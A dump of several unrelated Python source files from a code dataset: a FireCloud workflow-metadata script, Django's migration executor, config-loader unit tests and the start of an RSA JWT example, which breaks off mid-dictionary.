z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
#print('SUBMISSIONS ARE', z, z.json())
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
    print('looking at submission from', s['submissionDate'])
    submission_date = s['submissionDate']
    # Only look at submissions made today (date prefix match).
    if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
        print('skipping submission date ', submission_date)
        continue
    print('====================================================')
    print(s)
    print('getting submission')
    submission_id = s['submissionId']
    y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
    print('got submission')
    _write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
    # NOTE(review): only workflows[0] is inspected; multi-workflow
    # submissions would be partially dumped.
    if 'workflowId' not in y['workflows'][0]:
        print('workflow ID missing from submission!')
        continue
    print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
    beg = time.time()
    zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
                                         workflow_id=y['workflows'][0]['workflowId'])
    print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
    for f in dir(zz_result):
        print(' ', f, ' = ', getattr(zz_result, f))
    print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
    for f in dir(zz_result.raw):
        print(' ', f, ' = ', getattr(zz_result.raw, f))
    print('converting workflow metadata to json')
    try:
        zz = zz_result.json()
    except Exception as e:
        print('Error converting to json:', e)
        zz = {}
    # Only the metadata-fetch/decode time is accumulated into tot_time.
    tot_time += (time.time() - beg)
    print('saving workflow metadata')
    _write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
    if 'submittedFiles' in zz:
        dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
    #succ = [v["succeeded"] for v in zz['outputs']["run_sims_cosi2.replicaInfos"]]
    #print(f'Succeeded: {sum(succ)} of {len(succ)}')
# zzz = fapi.get_workflow_metadata(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=s['submissionId'],
#                                 workflow_id='ad1e8271-fe66-4e05-9005-af570e9e5884').json()
# _write_json('tmp/jz.json', **zzz)
print('tot_time=', tot_time, file=sys.stderr)
| 42.330579 | 135 | 0.679617 |
import argparse
import copy
import datetime
import json
import operator
import subprocess
import sys
import time
import firecloud.api as fapi
# Terra/FireCloud billing project (namespace) and workspace this script reads.
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
# List method configs, then fetch one specific config; both calls hit the
# live FireCloud API and assume success (no status check before .json()).
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
                              config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
    """Stringify ``value`` and write it to ``fname``, truncating the file."""
    with open(fname, 'w') as handle:
        handle.write('%s' % (value,))
def _pretty_print_json(json_dict, sort_keys=True):
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
    """Save the keyword args as pretty-printed JSON to ``fname`` and invoke
    the shell helper that converts the file to org format."""
    dump_file(fname=fname, value=_pretty_print_json(json_dict))
    print('converting', fname, 'to org')
    subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
    print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
    """Fetch a workflow's metadata for a submission, requesting a
    gzip-compressed response via the Accept-Encoding/User-Agent headers."""
    uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
                                                    workspace, submission_id, workflow_id)
    # deepcopy so the shared fiss agent headers are not mutated.
    headers = copy.deepcopy(fapi._fiss_agent_header())
    headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
    # NOTE(review): uses firecloud.api's private ``__get`` helper -- fragile
    # across fiss versions; confirm on upgrade.
    return fapi.__get(uri, headers=headers)
# Dump all workspace submissions, then walk today's submissions newest-first,
# saving each submission record and its workflow metadata under tmp/.
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
    print('looking at submission from', s['submissionDate'])
    submission_date = s['submissionDate']
    # Only look at submissions made today (date prefix match).
    if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
        print('skipping submission date ', submission_date)
        continue
    print('====================================================')
    print(s)
    print('getting submission')
    submission_id = s['submissionId']
    y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
    print('got submission')
    _write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
    # NOTE(review): only workflows[0] is inspected; multi-workflow
    # submissions would be partially dumped.
    if 'workflowId' not in y['workflows'][0]:
        print('workflow ID missing from submission!')
        continue
    print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
    beg = time.time()
    zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
                                         workflow_id=y['workflows'][0]['workflowId'])
    print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
    for f in dir(zz_result):
        print(' ', f, ' = ', getattr(zz_result, f))
    print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
    for f in dir(zz_result.raw):
        print(' ', f, ' = ', getattr(zz_result.raw, f))
    print('converting workflow metadata to json')
    try:
        zz = zz_result.json()
    except Exception as e:
        print('Error converting to json:', e)
        zz = {}
    # Only the metadata-fetch/decode time is accumulated into tot_time.
    tot_time += (time.time() - beg)
    print('saving workflow metadata')
    _write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
    if 'submittedFiles' in zz:
        dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
print('tot_time=', tot_time, file=sys.stderr)
| true | true |
f72eaf3c67b409384826a341503758bb4a502d32 | 14,180 | py | Python | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
"""
End-to-end migration execution - loads migrations, and runs them
up or down to a specified set of targets.
"""
    def __init__(self, connection, progress_callback=None):
        """
        connection: the database connection migrations will run against.
        progress_callback: optional callable invoked with progress events
            such as "apply_start" / "apply_success" during migrate().
        """
        self.connection = connection
        self.loader = MigrationLoader(self.connection)
        self.recorder = MigrationRecorder(self.connection)
        self.progress_callback = progress_callback
    def migration_plan(self, targets, clean_start=False):
        """
        Given a set of targets, returns a list of (Migration instance, backwards?).

        targets: iterable of (app_label, migration_name) pairs, where a name
            of None means "unmigrate the whole app".
        clean_start: if True, plan as if no migration were applied yet
            (used to compute the full forwards plan).
        """
        plan = []
        if clean_start:
            applied = set()
        else:
            applied = set(self.loader.applied_migrations)
        for target in targets:
            # If the target is (app_label, None), that means unmigrate everything
            if target[1] is None:
                for root in self.loader.graph.root_nodes():
                    if root[0] == target[0]:
                        for migration in self.loader.graph.backwards_plan(root):
                            if migration in applied:
                                plan.append((self.loader.graph.nodes[migration], True))
                                applied.remove(migration)
            # If the migration is already applied, do backwards mode,
            # otherwise do forwards mode.
            elif target in applied:
                # Don't migrate backwards all the way to the target node (that
                # may roll back dependencies in other apps that don't need to
                # be rolled back); instead roll back through target's immediate
                # child(ren) in the same app, and no further.
                next_in_app = sorted(
                    n for n in
                    self.loader.graph.node_map[target].children
                    if n[0] == target[0]
                )
                for node in next_in_app:
                    for migration in self.loader.graph.backwards_plan(node):
                        if migration in applied:
                            plan.append((self.loader.graph.nodes[migration], True))
                            applied.remove(migration)
            else:
                for migration in self.loader.graph.forwards_plan(target):
                    if migration not in applied:
                        plan.append((self.loader.graph.nodes[migration], False))
                        # Track as applied so a later target doesn't re-add it.
                        applied.add(migration)
        return plan
    def migrate(self, targets, plan=None, fake=False, fake_initial=False):
        """
        Migrates the database up to the given targets.

        Django first needs to create all project states before a migration is
        (un)applied and in a second step run all the database operations.

        fake: record migrations as (un)applied without running operations.
        fake_initial: detect already-created tables for initial migrations
            and fake those instead of failing.
        """
        if plan is None:
            plan = self.migration_plan(targets)
        # Create the forwards plan Django would follow on an empty database
        full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
        all_forwards = all(not backwards for mig, backwards in plan)
        all_backwards = all(backwards for mig, backwards in plan)
        if not plan:
            pass  # Nothing to do for an empty plan
        elif all_forwards == all_backwards:
            # This should only happen if there's a mixed plan
            raise InvalidMigrationPlan(
                "Migration plans with both forwards and backwards migrations "
                "are not supported. Please split your migration process into "
                "separate plans of only forwards OR backwards migrations.",
                plan
            )
        elif all_forwards:
            self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
        else:
            # No need to check for `elif all_backwards` here, as that condition
            # would always evaluate to true.
            self._migrate_all_backwards(plan, full_plan, fake=fake)
        self.check_replacements()
    def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
        """
        Take a list of 2-tuples of the form (migration instance, False) and
        apply them in the order they occur in the full_plan.
        """
        migrations_to_run = {m[0] for m in plan}
        state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
        for migration, _ in full_plan:
            if not migrations_to_run:
                # We remove every migration that we applied from this set so
                # that we can bail out once the last migration has been applied
                # and don't always run until the very end of the migration
                # process.
                break
            if migration in migrations_to_run:
                # Render the model states lazily, only once they're first
                # needed by a migration that is actually in the plan.
                if 'apps' not in state.__dict__:
                    if self.progress_callback:
                        self.progress_callback("render_start")
                    state.apps  # Render all -- performance critical
                    if self.progress_callback:
                        self.progress_callback("render_success")
                state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
                migrations_to_run.remove(migration)
            else:
                # Migration not in the plan: just advance the project state.
                migration.mutate_state(state, preserve=False)
    def _migrate_all_backwards(self, plan, full_plan, fake):
        """
        Take a list of 2-tuples of the form (migration instance, True) and
        unapply them in reverse order they occur in the full_plan.

        Since unapplying a migration requires the project state prior to that
        migration, Django will compute the migration states before each of them
        in a first run over the plan and then unapply them in a second run over
        the plan.
        """
        migrations_to_run = {m[0] for m in plan}
        # Holds all migration states prior to the migrations being unapplied
        states = {}
        state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
        if self.progress_callback:
            self.progress_callback("render_start")
        # First pass: walk the full forwards plan, recording the pre-migration
        # state for every migration we intend to unapply.
        for migration, _ in full_plan:
            if not migrations_to_run:
                # We remove every migration that we applied from this set so
                # that we can bail out once the last migration has been applied
                # and don't always run until the very end of the migration
                # process.
                break
            if migration in migrations_to_run:
                if 'apps' not in state.__dict__:
                    state.apps  # Render all -- performance critical
                # The state before this migration
                states[migration] = state
                # The old state keeps as-is, we continue with the new state
                state = migration.mutate_state(state, preserve=True)
                migrations_to_run.remove(migration)
            else:
                migration.mutate_state(state, preserve=False)
        if self.progress_callback:
            self.progress_callback("render_success")
        # Second pass: unapply in the (reverse) order given by the plan.
        for migration, _ in plan:
            self.unapply_migration(states[migration], migration, fake=fake)
    def collect_sql(self, plan):
        """
        Takes a migration plan and returns a list of collected SQL
        statements that represent the best-efforts version of that plan.

        No statements are executed: each migration runs against a
        collect_sql schema editor that only records the SQL it would emit.
        """
        statements = []
        state = None
        for migration, backwards in plan:
            with self.connection.schema_editor(collect_sql=True) as schema_editor:
                if state is None:
                    # Seed the state from the project state just before the
                    # first migration in the plan.
                    state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
                if not backwards:
                    state = migration.apply(state, schema_editor, collect_sql=True)
                else:
                    state = migration.unapply(state, schema_editor, collect_sql=True)
            statements.extend(schema_editor.collected_sql)
        return statements
    def apply_migration(self, state, migration, fake=False, fake_initial=False):
        """
        Runs a migration forwards.

        state: ProjectState before the migration.
        fake: record as applied without running database operations.
        fake_initial: fake automatically if the migration's tables/columns
            already exist (initial migrations only).
        RETURNS the ProjectState after the migration.
        """
        if self.progress_callback:
            self.progress_callback("apply_start", migration, fake)
        if not fake:
            if fake_initial:
                # Test to see if this is an already-applied initial migration
                applied, state = self.detect_soft_applied(state, migration)
                if applied:
                    fake = True
            if not fake:
                # Alright, do it normally
                with self.connection.schema_editor() as schema_editor:
                    state = migration.apply(state, schema_editor)
        # For replacement migrations, record individual statuses
        if migration.replaces:
            for app_label, name in migration.replaces:
                self.recorder.record_applied(app_label, name)
        else:
            self.recorder.record_applied(migration.app_label, migration.name)
        # Report progress
        if self.progress_callback:
            self.progress_callback("apply_success", migration, fake)
        return state
def unapply_migration(self, state, migration, fake=False):
"""
Runs a migration backwards.
"""
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
"""
Mark replacement migrations applied if their replaced set all are.
We do this unconditionally on every migrate, rather than just when
migrations are applied or unapplied, so as to correctly handle the case
when a new squash migration is pushed to a deployment that already had
all its replaced migrations applied. In this case no new migration will
be applied, but we still want to correctly maintain the applied state
of the squash migration.
"""
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
"""
Tests whether a migration has been implicitly applied - that the
tables or columns it would create exist. This is intended only for use
on initial migrations (as it only looks for CreateModel and AddField).
"""
if migration.initial is None:
# Bail if the migration isn't the first one in its app
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
# Make sure all create model and add field operations are done
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
# If we get this far and we found at least one CreateModel or AddField migration,
# the migration is considered implicitly applied.
return (found_create_model_migration or found_add_field_migration), after_state
| 47.424749 | 115 | 0.61488 | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
elif target in applied:
# may roll back dependencies in other apps that don't need to
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
pass # Nothing to do for an empty plan
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
migrations_to_run = {m[0] for m in plan}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
for migration, _ in full_plan:
if not migrations_to_run:
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
def _migrate_all_backwards(self, plan, full_plan, fake):
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps
states[migration] = state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
def collect_sql(self, plan):
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.apply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
if migration.initial is None:
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
return (found_create_model_migration or found_add_field_migration), after_state
| true | true |
f72eafd27fb8361f96937936ad725718e5ac8bea | 3,705 | py | Python | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | 2 | 2022-03-31T03:01:39.000Z | 2022-03-31T03:02:48.000Z | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
# As if imported from a module
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
'''The given config_file parameter is used for attribute lookups
'''
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
'''The given config_file_name is passed to the FileConfig constructor
'''
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
'''The given config_env name is passed to the FileConfig constructor
'''
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| 28.5 | 77 | 0.615115 | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| true | true |
f72eb0729c8579621c30a4f80dbbabfa81283a19 | 99 | py | Python | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| 33 | 78 | 0.777778 | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| true | true |
f72eb080d6a45bd70ccbae966aa6a0f3c15c3a83 | 585 | py | Python | app/rsa.py | FusionAuth/-fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | 2 | 2022-01-04T15:52:31.000Z | 2022-02-01T12:23:10.000Z | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
# User API
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
